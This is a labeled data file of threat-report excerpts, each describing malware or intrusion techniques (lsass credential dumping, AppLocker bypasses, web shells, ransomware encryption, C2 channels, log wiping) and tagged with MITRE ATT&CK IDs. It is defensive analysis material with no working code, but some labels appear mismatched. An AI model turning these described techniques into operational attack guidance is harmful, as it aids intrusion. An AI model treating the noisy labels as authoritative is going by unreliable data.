{"text1":"PwDumpVariant: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the GetHash export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig","labels":"['T1003.001']"}
{"text1":"The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy\/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar","labels":"['T1573.001']"}
{"text1":"Cardinal RAT is deployed using an interesting technique of compiling and executing a downloader via a malicious macro embedded within a Microsoft Excel file. The Excel files themselves contain lures that have financial themes. This threat has had a low volume of samples in the past two years, with 11 instances of Carp Downloader and 27 instances of Cardinal RAT observed","labels":"['T1204.002']"}
{"text1":"The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files","labels":"['T1113']"}
{"text1":"Once the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. A copy of the deobfuscated stager can be seen in the image below","labels":"['T1140']"}
{"text1":"The group used Ruler to configure a specially crafted Outlook Home Page URL to exploit the security bypass vulnerability CVE-2017-11774, which was fixed shortly after it was discovered. Successful exploitation automatically triggered remote code execution of a script when an Outlook client synced with a mailbox and rendered the profile Home Page URL. These scripts, usually VBScript followed by PowerShell, in turn initiated the delivery of various payloads","labels":"['T1203']"}
{"text1":"If this is successful, the malware creates a :0 alternate data stream in the executable and copies the executable\u2019s own contents to the stream. This can be used to restore the executable later. Then the malware replaces the contents of the executable with a copy of itself and launches the service. The file modified time of the executable is also artificially changed to 00:00:00 UTC. The purpose of this time change is so the file can be identified and restored by the decryption tool","labels":"['T1070.006']"}
{"text1":"DNS Monitoring Bypass The malware modifies the system DNS resolvers and uses Google\u2019s public DNS servers to avoid being detected by DNS monitoring tools","labels":"['T1562.001']"}
{"text1":"Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware\u2019s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one","labels":"['T1082']"}
{"text1":"1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud","labels":"['T1047']"}
{"text1":"The scripts themselves could be easily extracted and decompiled out of the binaries using uncompyle. The decompiled scripts employed some visual obfuscation techniques by naming variables as combinations of the characters \u2018o\u2019, \u2018O\u2019, and \u20180\u2019 to hinder analysis. In-depth analysis of the scripts showed the group employed AES in CBC mode using a predefined static key to encrypt files before uploading them to the C2 server","labels":"['T1027']"}
{"text1":"One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don\u2019t leave artifacts behind the way traditional malware does. Once they are deleted by the attackers\u2019 code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7","labels":"['T1070.004']"}
{"text1":"The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network. It was a ddos tool compiled to run on ARM systems","labels":"['T1021.002']"}
{"text1":"Using Frame1_Layout for macro execution and using lesser known API calls for shellcode execution is known to be used by Lazarus. We also were able to find infrastructure overlap between this campaign and past campaigns of Lazarus (Figure 19","labels":"['T1106']"}
{"text1":"Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication","labels":"['T1098.004']"}
{"text1":"Kwampirs uses a fairly aggressive means to propagate itself once inside a victim's network by copying itself over network shares","labels":"['T1021.002']"}
{"text1":"When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections.It is the way to keep in touch with the C&C, monitor user\u2019s activity and steal credentials","labels":"['T1055']"}
{"text1":"In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This \u2018connection bouncer\u2019 tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK","labels":"['T1090.002']"}
{"text1":"Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22","labels":"['T1560.003']"}
{"text1":"The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers","labels":"['T1071.001']"}
{"text1":"Some of BRONZE PRESIDENT's malware has persistence capabilities. For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose. Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload","labels":"['T1053.005']"}
{"text1":"Compromise website of strategic importance (e.g. websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts","labels":"['T1105']"}
{"text1":"Once decrypted, the backdoor takes a fingerprint of the system. It sends home various data, such as the computer and user names and the operating system version, before waiting for commands to carry out its main mission","labels":"['T1082']"}
{"text1":"Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the \/tmp directory","labels":"['T1564', 'T1564']"}
{"text1":"We discovered that TeamTNT gained initial access with the Hildegard malware by executing commands on kubelets that allow anonymous access. This was achieved by accessing the kubelet\u2019s run command API and executing commands on running containers","labels":"['T1133', 'T1609', 'T1609']"}
{"text1":"The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers. Due to their reliance on IE, these malware families intentionally configure the browser settings by modifying the following registry entries","labels":"['T1112', 'T1071.001']"}
{"text1":"We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc","labels":"['T1005']"}
{"text1":"The files are encrypted with a randomly generated 128-bit AES key in CBC mode with a NULL initialization vector. The key is generated per file, is encrypted with the generated RSA public key, and included in the encrypted file header. Each file encrypted by the malware starts with the string WANACRY. and has the WNCRY extension. Depending on the file properties, the malware may also stage files in a WNCRYT extension","labels":"['T1083']"}
{"text1":"Once TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related domains. It collects and sends information about where the target machine is located to the C2 servers","labels":"['T1008']"}
{"text1":"In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data","labels":"['T1082']"}
{"text1":"In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted","labels":"['T1070.004', 'T1070.001']"}
{"text1":"OverWatch continued to track the threat actor\u2019s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell1 to retrieve malware from their toolkit","labels":"['T1059.001']"}
{"text1":"Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. This version of mimikatz did not require any command line arguments, most likely in an attempt to avoid detection based on command-line auditing. The dumped hashes were used to authenticate to other machines via pass the hash","labels":"['T1003.001']"}
{"text1":"After gaining access to the victim\u2019s environment (presumably by using stolen credentials, either obtained via phishing, or bought on the dark web), the attacker sets up remote tunnelling using a SSH tool. The tool is configured to redirect traffic from a malicious domain to a proxy that is listening on a local port. The tunnel is authenticated using the attacker\u2019s private key","labels":"['T1572']"}
{"text1":"FoggyWeb is a passive and highly targeted backdoor capable of remotely exfiltrating sensitive information from a compromised AD FS server. It can also receive additional malicious components from a command-and-control (C2) server and execute them on the compromised server","labels":"['T1041', 'T1105']"}
{"text1":"In at least two incident response (IR) engagements, Blue Mockingbird has exploited public-facing web applications (T1190: Exploit Public-Facing Application) that implemented Telerik UI for ASP.NET AJAX. This suite of user interface components accelerates the web development process, but some versions are susceptible to a deserialization vulnerability, CVE-2019-18935. The exploitation of this CVE is not unique to Blue Mockingbird, but it has been a common point of entry","labels":"['T1190']"}
{"text1":"Lately, the configuration mechanism has been changed and is now stored in the Windows Registry at HKCU\\Software\\ under keys with names like %USERNAME% and ToolTech-RM. Those names, as well as the names of values they contain, change frequently, but the information contained consists of","labels":"['T1112']"}
{"text1":"Most of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is given to signed binaries to avoid detection","labels":"['T1553.002']"}
{"text1":"In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers. In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm. These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group\u2019s more traditional attack methods (spear phishing and credential phishing","labels":"['T1090.003']"}
{"text1":"The ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\" campaigns contained a reconnaissance phase. The malware uses the following registry key to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. The source code only considers the following machine types","labels":"['T1012']"}
{"text1":"The DNS response will return a CNAME record that points to a Command and Control (C2) domain. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications","labels":"['T1071.004']"}
{"text1":"The actors\u00a0leveraged\u00a0publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on\u00a0victim networks to collect Active Directory information and credentials. WMIC commands\u00a0have been used\u00a0to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to\u00a0res.txt. The actors used the\u00a0Nltest\u00a0command to list domain controllers","labels":"['T1018']"}
{"text1":"For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques","labels":"['T1127.001']"}
{"text1":"If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the \/reset flag to reset the executable\u2019s permissions, then using takeown.exe with the \/F flag to take ownership of the executable","labels":"['T1007']"}
{"text1":"Microsoft by default disables the dynamic execution of the macro, and if an attacker needs to execute one dynamically\u2014which is the case here\u2014the threat actor needs to bypass the VB object model (VBOM) by modifying its registry value","labels":"['T1112']"}
{"text1":"After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below","labels":"['T1505.003']"}
{"text1":"This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information","labels":"['T1119']"}
{"text1":"The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the \u201cUPX. string, it has been replaced with \u201cLSD. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team","labels":"['T1027']"}
{"text1":"According to Group-IB's Threat Intelligence & Attribution system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. Starting from at least February 23, 2021, a device inside the company's network communicated with a server with the IP address 185[.]118[.]166[.]66. The threat actor collected information inside the local network, including names of network resources and their addresses. Below are examples of commands that were used for lateral movement: . The name of the campaign, ColunmTK, is derived from these initially discovered domains. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers","labels":"['T1049']"}
{"text1":"Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors","labels":"['T1083']"}
{"text1":"It then issues a SOAP request to delete the processed email. This completes the process in which the payload receives inbound communications from the actor","labels":"['T1070.004']"}
{"text1":"Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization\u2019s network environment, including process and service names belonging to endpoint protection software","labels":"['T1489']"}
{"text1":"Prior to 2014, IRON LIBERTY used custom malware, primarily Sysmain, Havex, and xFrost (now known as Karagany), combined with commodity penetration testing and tools","labels":"['T1189']"}
{"text1":"The Bluetooth functionality in Flamer is encoded in a module called \"BeetleJuice\". This module is triggered according to configuration values set by the attacker. This means that a computer compromised by W32.Flamer will appear when any other Bluetooth device scans the local area. In addition to enabling a Bluetooth beacon, Flamer encodes details about the infected computer (see Figure 1) and then stores these details in a special 'description' field. When any other device scans for Bluetooth-enabled devices, this description field will be displayed: These are the facts of how Flamer uses Bluetooth. The attacker, however, could identify the location of compromised devices using Bluetooth. The Beetlejuice module already has retrieved a list of all the devices IDs which are near to the infected computer and so the attacker knows what devices belong to the victim. Some attacks have even identified Bluetooth devices more than one mile away. With increase functionality an attacker, having identified various Bluetooth devices in range, could perform numerous attacks: - Steal contacts from an address book, steals SMS messages, steals images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer","labels":"['T1011.001']"}
{"text1":"The SysInfo plugin runs a selection of basic reconnaissance commands on the victim's machine via a cmd.exe process","labels":"['T1059.003']"}
{"text1":"To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class","labels":"['T1560.002']"}
{"text1":"On top of this configuration change, this sample does not use the libcurl library for network exfiltration. Instead, it uses an external library. To locate it, the backdoor tries to decrypt each file in the current directory using AES-256-CBC with the key gFjMXBgyXWULmVVVzyxy padded with zeroes. Each file is \u201cdecrypted\u201d and saved as \/tmp\/store and an attempt to load it as a library made using the dlopen function. When a decryption attempt results in a successful call to dlopen, the backdoor then retrieves the exported functions Boriry and ChadylonV, which seem to be responsible for the network communication with the server. As we do not have the dropper or other files from the original sample\u2019s location, we could not analyse this library. Moreover, since the component is encrypted, a YARA rule based on these strings would not match the file found on disk","labels":"['T1027']"}
{"text1":"FIVEHANDS uses an embedded NTRU public key. This NTRU key is SHA512 hashed and the first 32 bytes are used as the victim ID within the ransom note. This NTRU pubic key is also used to encrypt each file's symmetric key. For the symmetric key, FIVEHANDS uses an embedded generation routine to produce 16 random bytes used for an AES key to encrypt each file. After each file is encrypted, the original file size, magic value of DE C0 AD BA, and AES key are encrypted with the public NTRU key and appended to the file. The four magic bytes DB DC CC AB are appended to the end of the encrypted file. FIVEHANDS includes additional code not found in DEATHRANSOM and HELLOKITTY to use the Windows Restart Manager to close a file currently in use so that it can be unlocked and successfully encrypted","labels":"['T1486']"}
{"text1":"The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location. The Seedworm group is the only group known to use the Powermud backdoor","labels":"['T1090.002']"}
{"text1":"While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. This IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the ThreeDollars delivery document. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware in this section","labels":"['T1008']"}
{"text1":"By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. Thus the 2FA code was sent with supporting Chinese text","labels":"['T1111']"}
{"text1":"The script will then proceed to download a tar compressed archive\u00a0from a\u00a0download server according to the architecture of the compromised system","labels":"['T1105']"}
{"text1":"In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. The additional steps taken to wipe the actual hard drive partition differentiate its behavior from other wiper malware like NotPetya. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable","labels":"['T1542.003']"}
{"text1":"Process name, service name, and driver path listings are obtained, and each value is hashed via the FNV-1a + XOR algorithm as described previously and checked against hardcoded blocklists. Some of these hashes have been brute force reversed as part of this analysis, showing that these routines are scanning for analysis tools and antivirus engine components. If a blocklisted process is found the Update routine exits and the sample will continue to try executing the routine until the blocklist passes. Some entries in the service list if found on the system may affect the DGA algorithms behavior in terms of the values generated. The list of stopped services is then bit-packed into the ReportWatcherPostpone key of the appSettings entry for the samples\u2019 config file. The sample retrieves a driver listing via the WMI query Select * From Win32_SystemDriver","labels":"['T1057']"}
{"text1":"Note that the actor used the DLL name wercplsupporte.dll as an attempt to masquerade as the legitimate DLL name, which is wercplsupport.dll (T1036.005: Match Legitimate Name or Location). In addition, more masquerading was used to make malicious Scheduled Tasks blend in with legitimate ones (T1053.005: Scheduled Task","labels":"['T1036.005']"}
{"text1":"All this data is merged in one file xmlrwbin.inc, which is then encrypted with RC4. To be able to decipher the data, the attacker should certainly know either the MD5 hash or the whole buffer content. This data is also sent, but RSA encrypted. The malware constructs a 1120 bit public key, uses it to encrypt the 117-bytes buffer. The malware then concatenates all the data to be sent as a 128-bytes block. The resulting data is saved in C:Program FilesCommon FilesSystemOle DB to a file named according to the following format","labels":"['T1070.004']"}
{"text1":"The file reflectively injects a ransomware DLL into the memory of the legitimate running process explorer.exe","labels":"['T1055.001']"}
{"text1":"They renamed their files to make them look like legitimate files, for example, KB77846376.exe, named after Microsoft update files. They routinely used standard tools that would mimic legitimate administrator activities. When planting webshells on the Outlook Exchange servers, they modified already existing legitimate flogon.js and logoff.aspx files. They relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution. They used multiple staging folders and opted to use directories that were used infrequently by legitimate users or processes. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools","labels":"['T1070.004']"}
{"text1":"Limited obfuscation was encountered, where the authors split up strings into smaller sub-strings and used \u2018strcpy\u2019 and \u2018strcat\u2019 calls to re-build them prior to use. They also used this same technique to generate garbage strings that are never used. Comments have been added to show the fully-generated strings","labels":"['T1027']"}
{"text1":"We also noticed that the\u00a0actors reused the\u00a0VBS decode function\u00a0published by\u00a0Motobit. Figure 4 shows the comparison between the\u00a0base64\u00a0function used in the macro code and the VBS\u00a0base64\u00a0decoder function published by\u00a0Motobit","labels":"['T1059.005']"}
{"text1":"Windows AppLocker allows administrators to control which executable files are denied or authorized to execute. AppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. A number of legitimate Windows executables that are not blocked by the default AppLocker policies has been discovered and various proof of concept AppLocker bypass code became publicly available. Example of malicious scriptlet file used to drop a malicious DLL dropper for the next stage Microsoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. To bypass AppLocker and launching script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: Here, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. Payload dropper in an XSL file Another executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. It takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the <msxsl:script> tag of the supplied XSL file when invoked through a call placed within the <xsl:value-of> tag. Invoking the JScript code of the payload dropper within an XSL file The supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis","labels":"['T1220']"}
{"text1":"Inception is continuing to use chains of infected routers to act as proxies and mask communications between the attackers and the cloud service providers they use. Certain router manufacturers have UPnP listening on WAN as a default configuration. These routers are hijacked by Inception and configured to forward traffic from one port to another host on the internet. Abuse of this service requires no custom malware to be injected on the routers and can be used at scale very easily. Inception strings chains of these routers together to create multiple proxies to hide behind","labels":"['T1090.003']"}
{"text1":"The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the \/tmp folder","labels":"['T1140']"}
{"text1":"While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol","labels":"['T1090.001']"}
{"text1":"Nonetheless, the infected DLL contains just one method (named DynamicRun), that can receive a C# script from a web request, compile it on the fly, and execute it","labels":"['T1059.001']"}
{"text1":"There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI","labels":"['T1137.004']"}
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hashing algorithm generates a CRC32 hash of the string, converted to lowercase. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules. The hash algorithm has been replicated in Python below","labels":"['T1027']"}
{"text1":"Targets are approached with spearphishing emails that contain a link to a ZIP file hosted on Google Drive. That archive contains several LNK (aka shortcut) files that extract and execute a malicious JavaScript component, while displaying a decoy document","labels":"['T1204.001', 'T1566.002']"}
{"text1":"Throughout our research, we witnessed several different infection chains being used to deliver the Aria-body backdoor. This RTF file, which was infected (weaponized) with the RoyalRoad exploit builder, drops a loader named intel.wll into the target PC\u2019s Word startup folder. The loader in turn tries to download and execute the next stage payload from spool.jtjewifyn[.]com","labels":"['T1137.006']"}
{"text1":"When running on Windows 7, the malicious library uses the Metasploit Framework\u2019s open-source code Win7Elevate to inject malicious code into explorer.exe","labels":"['T1055']"}
{"text1":"Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros","labels":"['T1204.002']"}
{"text1":"RTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to be created using a version of an exploit toolkit, often referred to as Threadkit. Threadkit is not exclusively used by the actors behind the observed attacks but also by other groups utilizing various payloads, including Trickbot, Lokibot, SmokeLoader and some other banking malware. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the original exploit code discovered in May this year. CVE-2018-8174 VB script exploit code","labels":"['T1203']"}
{"text1":"BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities","labels":"['T1082']"}
{"text1":"Upon execution, the Micropsia malware takes screenshots every 90 seconds by calling to Gdi32.BitBlt API. Screenshots are saved as unencrypted files in JPEG format with a specific file name that contains the current timestamp (yyyy-mm-dd hh-nn-ss) with the hardcoded extension .his","labels":"['T1113']"}
{"text1":"Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: Listing files in directory Creating arbitrary processes Writing data received from control servers to files on disk Gathering information for all drives Gathering process times for all processes Sending the contents of a specific file to the control server Wiping and deleting files on disk Setting the current working directory for the implant Sending disk space information to the control server - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers","labels":"['T1082', 'T1057', 'T1083']"}
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. We then conducted a static analysis to examine Lokibot\u2019s techniques and targets. The response for this request is a customized 404 page, which can also be detected using Suricata signatures provided on the Malpedia page cited above as well. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. This is a strong indication that the binary is a .NET library, because mscoree.dll and _CoreExeMain are primarily used to load .NET binaries. Figure 9Hollow Process; Manually Unpacking the First Stage BinaryWe tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity. Because the malware was loaded into vbc.exe, the process viewer will show it as a legitimate process, making it more difficult for a user to identify","labels":"['T1055.012']"}
{"text1":"In a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in WinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit was used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the vulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the targeted computer","labels":"['T1203']"}
{"text1":"When the decrypt button is clicked without the ransom being paid, the malware decrypts the files listed in f.wnry. The files listed in f.wnry are those randomly selected to be encrypted with the embedded public key","labels":"['T1486']"}
{"text1":"The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS","labels":"['T1071.001']"}
